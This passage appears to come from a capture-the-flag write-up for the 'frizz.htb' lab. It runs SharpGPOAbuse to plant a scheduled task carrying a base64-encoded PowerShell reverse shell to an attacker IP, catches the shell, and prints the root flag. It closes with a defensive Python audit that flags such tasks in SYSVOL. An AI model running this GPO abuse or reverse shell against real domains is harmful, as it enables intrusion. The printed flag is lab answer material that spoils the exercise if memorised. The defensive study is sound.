PS C:\Users\M.SchoolBus\Desktop> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author frizz.htb\Administrator --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --GPOName "EvilGPO"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] GUID of "EvilGPO" is: {DA1F3942-EC4A-462D-B0BF-F215B41A5DFB}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{DA1F3942-EC4A-462D-B0BF-F215B41A5DFB}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus\Desktop> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Reverse shell connection established
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.81] from (UNKNOWN) [10.129.232.168] 57323
PS C:\Windows\system32>
Read root.txt
PS C:\Users\Administrator\Desktop> type root.txt
39c2947105c0ce6e3f15365b164244fa
PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::950b:6c07:4edf:da3b
Link-local IPv6 Address . . . . . : fe80::f3b8:2aba:2c88:49c0%5
IPv4 Address. . . . . . . . . . . : 10.129.232.168
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1
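Added example, not part of the original writeup and not code from SharpGPOAbuse: a SYSVOL audit a defender can run over the ScheduledTasks.xml files under Policies\{GUID}\Machine\Preferences\ScheduledTasks\ to find the kind of immediate task the privilege escalation above creates. The sample XML, its GUIDs, task names and the benign encoded payload are constructed for this example and only follow the shape of Group Policy Preferences task XML; the flag regex, the decoding of -EncodedCommand (base64 over UTF-16LE) and the scoring rule are this example's own.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed sample modelled on a GPP ScheduledTasks.xml. GUIDs and names are illustrative.
SAMPLE_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{00000000-0000-0000-0000-00000000aaaa}">
  <ImmediateTaskV2 clsid="{00000000-0000-0000-0000-00000000bbbb}" name="New Task" image="0"
                   changed="2026-01-25 04:55:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="New Task" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c powershell -NoP -W Hidden -e __ENC__</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{00000000-0000-0000-0000-00000000cccc}" name="Weekly Defrag" image="0"
          changed="2025-03-01 09:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="C" name="Weekly Defrag" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Windows\System32\defrag.exe</Command>
            <Arguments>C: /U</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# PowerShell accepts -e, -ec, -enc and -EncodedCommand (case-insensitive) for the same switch.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """The form -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(arguments: str) -> Optional[str]:
    """Return the decoded script if the argument string carries an encoded command, else None."""
    m = ENCODED_FLAG.search(arguments or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable payload>"


def audit_scheduled_tasks(xml_text: str) -> List[Dict]:
    """One finding per task element; 'suspicious' marks an immediate task that either
    decodes to a hidden script or is configured to run as SYSTEM."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root:
        props = task.find("Properties")
        cmd = task.find(".//Exec/Command")
        args = task.find(".//Exec/Arguments")
        run_as = props.get("runAs", "") if props is not None else ""
        arguments = args.text if args is not None and args.text else ""
        decoded = decode_encoded_command(arguments)
        f = {
            "name": task.get("name"),
            "type": task.tag,
            "immediate": task.tag.startswith("ImmediateTask"),
            "runs_as_system": run_as.upper().endswith("\\SYSTEM"),
            "command": cmd.text if cmd is not None else None,
            "arguments": arguments,
            "decoded": decoded,
        }
        f["suspicious"] = f["immediate"] and (decoded is not None or f["runs_as_system"])
        findings.append(f)
    return findings


def render_sample() -> str:
    """Fill the placeholder with a benign encoded script; only its shape matters here."""
    return SAMPLE_XML.replace("__ENC__", encode_powershell("Write-Output 'constructed sample'"))


if __name__ == "__main__":
    for f in audit_scheduled_tasks(render_sample()):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print("%-10s %-16s %-14s runAs=SYSTEM:%s decoded=%r" % (flag, f["type"], f["name"], f["runs_as_system"], f["decoded"]))
```

Two points from the SharpGPOAbuse output pair with this audit: the versionNumber attribute on the GPO object and the version in GPT.ini are bumped when the task is written, so a GPO linked to the Domain Controllers OU whose version changes outside a change window is the cheapest trigger, and the gPLink write on the OU itself (what BloodHound flagged above) is what to alert on before any task file appears.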